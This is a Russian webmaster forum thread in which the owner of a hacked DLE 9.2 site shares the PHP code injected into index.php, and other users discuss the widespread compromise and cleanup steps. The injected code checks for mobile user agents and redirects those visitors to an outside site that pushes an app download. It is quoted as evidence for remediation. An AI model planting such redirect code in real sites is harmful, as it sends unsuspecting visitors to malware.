X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали DLE 9.2, нужны советы!, Распространение мобильного вируса
Bogdan_H
Bogdan_H
Topic Starter сообщение 18.1.2013, 15:05; Ответить: Bogdan_H
Сообщение #1


Участник
***

Группа: User
Сообщений: 177
Регистрация: 11.10.2009
Поблагодарили: 30 раз
Репутация:   6  


Случайно узнал, что мой сайт взломали, да и я бы не заметил, ведь суть такова, заходишь со смартфона на сайт и тебе сразу же скачивается приложения. Быстро просмотрев логи, увидел следующие изменения в index.php

$tpl->set ( '{content}', "<div id='dle-content'>" . $tpl->result['content'] . "</div>" );



$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");



if ($iphone || $android || $palmpre || $ipod || $berry === true) {

    header('Location: http://statuses.ws/');

}$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");



if ($iphone || $android || $palmpre || $ipod || $berry === true) {

    header('Location: http://statuses.ws/');

}$tpl->compile ( 'main' );


Вроде все заплатки стоят, хостинг надежный, от фтп пароль тоже не из простых, есть идеи у кого то, как такое случилось и что делать?

Сообщение отредактировал Bogdan_H - 18.1.2013, 15:08
1
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Volandmax
Volandmax
сообщение 18.1.2013, 15:07; Ответить: Volandmax
Сообщение #2


Частый гость
**

Группа: User
Сообщений: 64
Регистрация: 29.11.2011
Из: Москва
Поблагодарили: 14 раз
Репутация:   2  


ты не первый далеко. у многих сейчас такая проблема. видимо какая то неизвестная уязвимость. в любом случае решения пока я не видел
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Bogdan_H
Bogdan_H
Topic Starter сообщение 18.1.2013, 15:26; Ответить: Bogdan_H
Сообщение #3


Участник
***

Группа: User
Сообщений: 177
Регистрация: 11.10.2009
Поблагодарили: 30 раз
Репутация:   6  


(Volandmax @ 18.1.2013, 14:07) *
ты не первый далеко. у многих сейчас такая проблема. видимо какая то неизвестная уязвимость. в любом случае решения пока я не видел

Да, у меня тоже была мысль об этом, решил проверить сайт друга, другая версия движка, другой хостинг, та же беда. Но это хотя бы означает, что уязвимость не в хостинге, а в любимом DLE <3

Сообщение отредактировал Bogdan_H - 18.1.2013, 15:29
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
predator-hoi
predator-hoi
сообщение 18.1.2013, 15:57; Ответить: predator-hoi
Сообщение #4


Завсегдатай
*****


Группа: Active User
Сообщений: 591
Регистрация: 30.8.2009
Поблагодарили: 87 раз
Репутация:   8  


Данная проблема имеет массовый характер, вот тут идет более активное обсуждение:
http://forum.searchengines.ru/showthread.php?t=764551
http://forum.dle-news.ru/index.php?showtopic=62025&st=0


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Bogdan_H
Bogdan_H
Topic Starter сообщение 18.1.2013, 16:22; Ответить: Bogdan_H
Сообщение #5


Участник
***

Группа: User
Сообщений: 177
Регистрация: 11.10.2009
Поблагодарили: 30 раз
Репутация:   6  


(predator-hoi @ 18.1.2013, 14:57) *
/forum.searchengines.ru/showthread.php?t=764551
http://forum.dle-news.ru/index.php?showtopic=62025&st=0

Спасибо, сейчас буду изучать, пока что вылечил сайт,удалением постороннего кода, со следующих файлов:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 18.1.2013, 16:26; Ответить: kagtus
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


поставь 444 на эти файлы, временно спасает от повторного добавления...


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
djalin
djalin
сообщение 18.1.2013, 16:39; Ответить: djalin
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 414
Регистрация: 8.5.2011
Поблагодарили: 87 раз
Репутация:   9  


а линк на приложение можно в личку?


--------------------
Услуги: установка WP + плагины. Установка SAPE: wordpress/phpbb/Quick.Cms/некоторые самописы (php)
Хостинг - The HostVille
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
predator-hoi
predator-hoi
сообщение 18.1.2013, 17:01; Ответить: predator-hoi
Сообщение #8


Завсегдатай
*****


Группа: Active User
Сообщений: 591
Регистрация: 30.8.2009
Поблагодарили: 87 раз
Репутация:   8  


Права на файлы не помогают, шелл их потом свободно меняет, также дата изменения файла может быть нормальной, откуда оно все лезет пока неизвестно.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Bogdan_H
Bogdan_H
Topic Starter сообщение 18.1.2013, 17:08; Ответить: Bogdan_H
Сообщение #9


Участник
***

Группа: User
Сообщений: 177
Регистрация: 11.10.2009
Поблагодарили: 30 раз
Репутация:   6  


Я принял следующие меры:
1. Удалил вредоносный код с файлов:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
2. Удалил всех пользователей начиная с 14-го февраля (сайт был взломан 16-го).
3. Закрыл регистрацию на сайте.
4. Удалил все .gif файлы c папки uploads/fotos с датой от 14-го февраля.
5. Поставил три последние заплатки с dle-news ru.
Пароли и права файлов не менял, так как думаю, что дело не в них вовсе. Пока сайт со смартфона открывается нормально, без загрузок файлов, если будут изменения, отпишусь.

Сообщение отредактировал Bogdan_H - 18.1.2013, 17:10
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
arturios
arturios
сообщение 18.1.2013, 17:19; Ответить: arturios
Сообщение #10


JavaSE
******

Группа: Super Moderator
Сообщений: 1803
Регистрация: 16.10.2012
Из: Москва
Поблагодарили: 1295 раз
Репутация:   78  


Удалил все .gif файлы

в png тож бываю частенько.
Скоро придется самим фоткать и добавлять ибо уже даже картинку с нэта опасно на сайт кидать
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Взломали аккаунт Алиекспресс
Внимание мошенники
8 Intersect 361 Сегодня, 16:13
автор: Infacto
Горячая тема (нет новых ответов) Нужны ли SEO курсы
47 ByhAnka 7740 Сегодня, 11:08
автор: Ley
Открытая тема (нет новых ответов) Веду набор в команду. Нужны специалисты.
0 SequelONE 241 Вчера, 13:35
автор: SequelONE
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102716 Вчера, 10:55
автор: kukla
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1147 13.12.2017, 23:36
автор: Nell


 



RSS Текстовая версия Сейчас: 15.12.2017, 16:46
Дизайн